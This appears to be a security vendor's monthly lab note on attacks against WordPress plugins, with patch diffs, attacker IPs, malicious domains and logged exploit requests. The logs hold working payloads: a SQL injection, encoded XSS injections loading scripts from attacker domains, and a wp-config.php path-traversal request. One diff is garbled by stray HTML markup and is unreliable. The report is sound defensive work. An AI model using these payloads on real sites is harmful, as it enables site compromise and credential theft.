Relevant Plugins and Vulnerabilities:
| Plugin | Vulnerability | Patched Version | Installs |
| WP Product Review | Unauthenticated Stored XSS | 3.7.6 | 40000 |
| Form Maker by 10Web | Authenticated SQL Injection | — | 100000 |
| Add-on SweetAlert Contact Form 7 | Authenticated XSS | 1.0.8 | 20 |
| Paid Memberships Pro | Authenticated SQL Injection | 2.3.3 | 90000 |
| Visual Composer | Authenticated XSS | 27 | 80000 |
| Team Members | Authenticated XSS | 5.0.4 | 40000 |
| Photo Gallery by 10Web | Unauthenticated SQL Injection | 1.5.55 | 300000 |
| Login/Signup Popup | Authenticated XSS | 1.5 | 10000 |
| Easy Testimonials | Authenticated Stored XSS | 3.6 | 30000 |
| WooCommerce | Unescaped Metadata | 4.1.0 | 5000000 |
| Page Builder by SiteOrigin | CSRF to XSS | 2.10.16 | 1000000 |
| Chopslider | Authenticated SQL Injection | — | 200 |
| Elementor Pro | Authenticated File Upload | 2.9.4 | 100000 |
| LearnPress | Privilege Escalation | 3.2.6.9 | 80000 |
| Elementor | Authenticated Stored XSS | 2.9.8 | 4000000 |
| Avada | Authenticated Stored XSS | 6.2.3 | 500000 |
| Ninja Forms | CSRF to Stored XSS | 3.4.24.2 | 1000000 |
| Advanced Order Export For Woo | Authenticated XSS | 3.1.4 | 90000 |
| Quick Page/Post redirect | Authenticated Settings Update | — | 100000 |
| Ultimate Addons for Elementor | Registration Bypass | 1.24.2 | 100000 |
| WTI Like Post | Authenticated XSS | — | 10000 |
| WP-Advanced-Search | Authenticated SQL Injection | 3.3.7 | 1000 |
| Gmedia Photo Gallery | Authenticated XSS | 1.18.5 | 10000 |
Highlights for May 2020
- Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
- Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
- Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.
Details for these highlights can be found under the components listed below.
WP Product Review
Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.
Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:
181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
Patch (version 3.7.6):
Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php =================================================================== --- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php +++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php @@ -97,4 +97,7 @@ 'methods' => 'POST', 'callback' => array( $this, 'update_review_callback' ), + 'permission_callback' => function () { + return current_user_can( 'edit_posts' ); + }, 'args' => array( 'id' => array( --- Index: wp-product-review/trunk/includes/functions.php =================================================================== --- a/wp-product-review/trunk/includes/functions.php +++ b/wp-product-review/trunk/includes/functions.php @@ -229,5 +229,5 @@ } ?> - <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank"> + <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank"> <img src="<?php echo esc_attr( $src ); ?>"
Elementor
Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.
Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:
69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" [...]
Photo Gallery by 10Web
An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.
Patch (version 1.5.55):
Index: photo-gallery/trunk/frontend/models/model.php =================================================================== --- a/photo-gallery/trunk/frontend/models/model.php +++ b/photo-gallery/trunk/frontend/models/model.php @@ -197,32 +197,32 @@ public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) { - if ( $albums_per_page < 0 ) { + if ( $albums_per_page < 0 ) { $albums_per_page = 0; } global $wpdb; - $order_by = 'ORDER BY</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>' . $order_by; - if( $sort_by == 'random' || $sort_by == 'RAND()' ) { - $order_by = 'ORDER BY RAND()'; - } - $search_where = ''; - $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) ); - if ( !empty($search_value) ) { - $search_keys = explode(' ', $search_value); + $order_by = 'ORDER BY</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>' . $order_by; + if ( $sort_by == 'random' || $sort_by == 'RAND()' ) { + $order_by = 'ORDER BY RAND()'; + } + $search_where = ''; + $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) ); + if ( !empty( $search_value ) ) { + $search_keys = explode( ' ', $search_value ); $alt_search = '('; $description_search = '(';
Payload Used by Attackers:
185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17
Plugin & Theme Payloads Added to Ongoing Campaign
Malicious Domains & Detected IPs
Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:
css[.]digestcolect[.]com cls[.]balantfromsun[.]com count[.]trackstatisticsss[.]com
The following IPs have also been associated with this campaign:
79.133.202.70 154.43.128.23 185.162.127.248 51.83.70.152 213.159.210.170 139.162.28.41 139.99.169.192 185.217.0.224 84.238.108.177 62.210.180.8 [...]
Exploit Attempts Seen in the Wild
Our team identified attacks against the following vulnerable plugins and themes.
Bold Page Builder (From Last Year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12
WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"
Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"
Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.
To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.
Rianna MacLeod
Celise Davison
Sucuri Malware Research Team
Denis Sinegubko
Daniel Cid
Ben Martin
Yuliyan Tsvetkov
Victor Santoyo
Antony Garand
Cesar Anjos